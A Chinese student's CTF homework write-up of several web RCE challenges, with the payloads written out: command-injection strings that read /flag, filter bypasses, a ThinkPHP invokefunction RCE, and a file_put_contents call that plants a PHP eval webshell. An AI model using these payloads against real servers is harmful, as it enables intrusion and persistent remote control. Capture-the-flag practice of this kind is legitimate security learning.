news 2026/5/1 6:12:16

作业 web rce

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
作业 web rce

25计科秦欢

假期作业

[SWPUCTF 2021 新赛]easyrce

/?url=system(“ls /”); 列出根目录

/?url=system(“cat /flag”);

[SWPUCTF 2021 新生赛]babyrce

打开环境,有代码得,要在控制台中cookie添加一个应用程序

访问得到一个文件,/rasalghul.php接着访问,由代码得出要过滤空格,

?url=ls #列出根目录,

使用$IFS %09 过滤空格

[SWPUCTF 2021 新生赛]finalrce

打开环境发现过滤了很多字符,构建一个文件6.txt

/?url=l\s /|tee 6.txt

然后直接访问文件

要打开flag文件,使用/?url=tac /flllll\aaaaaaggggggg|tee 7.txt

然后直接访问7.txt文件

[SWPUCTF 2022 新生赛]ez_rce

打开环境,发现什么也没有,使用dirseach扫描,发现文件

接着访问文件,当访问到/robots.txt时,发现下面语句

接着访问/NSS/index.php ,要特别注意这里大小写不能错,否则访问不出来

接着搜索图上内容得到解决方法,

接着输入

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>
在输入上面字符

接下就要用到蚁剑了,连接到蚁剑

拿到flag

[SWPUCTF 2023 秋季新生赛]RCE-PLUS

打开环境,根据题目意思发现参数是cmd,使用http://node4.anna.nssctf.cn:28223/?cmd=ls%20/|tee%20a.txt

创建一个文件a.txt,然后访问

然后使用这个/?cmd=cat /f*|tee a.txt,再次访问得到flag

[NISACTF 2022]middlerce

这题使用的是正则匹配的NIF匹配引擎,这个匹配引擎的原理是基于从后往前回溯的匹配机制

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 6:08:11

中文数字、时间、金额自动转换?试试科哥开发的FST ITN-ZH WebUI镜像

中文数字、时间、金额自动转换&#xff1f;试试科哥开发的FST ITN-ZH WebUI镜像 1. 背景与需求&#xff1a;为什么需要中文逆文本标准化&#xff08;ITN&#xff09; 在语音识别、自然语言处理和文档自动化场景中&#xff0c;我们经常面临一个看似简单却影响深远的问题&#…

作者头像 李华
网站建设 2026/4/8 20:25:57

Edge TTS实战指南:高效实现Python语音合成技术

Edge TTS实战指南&#xff1a;高效实现Python语音合成技术 【免费下载链接】edge-tts Use Microsoft Edges online text-to-speech service from Python WITHOUT needing Microsoft Edge or Windows or an API key 项目地址: https://gitcode.com/GitHub_Trending/ed/edge-tt…

作者头像 李华
网站建设 2026/4/25 8:13:12

终极指南:5个步骤让Java HTTP调用变得简单高效

终极指南&#xff1a;5个步骤让Java HTTP调用变得简单高效 【免费下载链接】forest 声明式HTTP客户端API框架&#xff0c;让Java发送HTTP/HTTPS请求不再难。它比OkHttp和HttpClient更高层&#xff0c;是封装调用第三方restful api client接口的好帮手&#xff0c;是retrofit和f…

作者头像 李华
网站建设 2026/5/1 6:08:11

如何快速掌握Midscene扩展:浏览器自动化的终极指南

如何快速掌握Midscene扩展&#xff1a;浏览器自动化的终极指南 【免费下载链接】midscene Let AI be your browser operator. 项目地址: https://gitcode.com/GitHub_Trending/mid/midscene Midscene.js是一款革命性的浏览器自动化工具&#xff0c;通过AI驱动的Chrome扩…

作者头像 李华
网站建设 2026/4/30 5:53:17

如何通过3款开源工具实现数据中心可视化

如何通过3款开源工具实现数据中心可视化 【免费下载链接】awesome-sysadmin A curated list of amazingly awesome open-source sysadmin resources. 项目地址: https://gitcode.com/GitHub_Trending/aw/awesome-sysadmin 在日常运维工作中&#xff0c;你是否经常面临这…

作者头像 李华
网站建设 2026/5/1 2:58:08

实测Qwen3-4B-Instruct:40亿参数AI写作效果惊艳

实测Qwen3-4B-Instruct&#xff1a;40亿参数AI写作效果惊艳 1. 引言&#xff1a;为何关注4B级大模型的文本生成能力&#xff1f; 在当前AI大模型快速演进的背景下&#xff0c;参数规模与推理能力之间的关系愈发显著。尽管千亿参数模型在云端展现出强大性能&#xff0c;但40亿…

作者头像 李华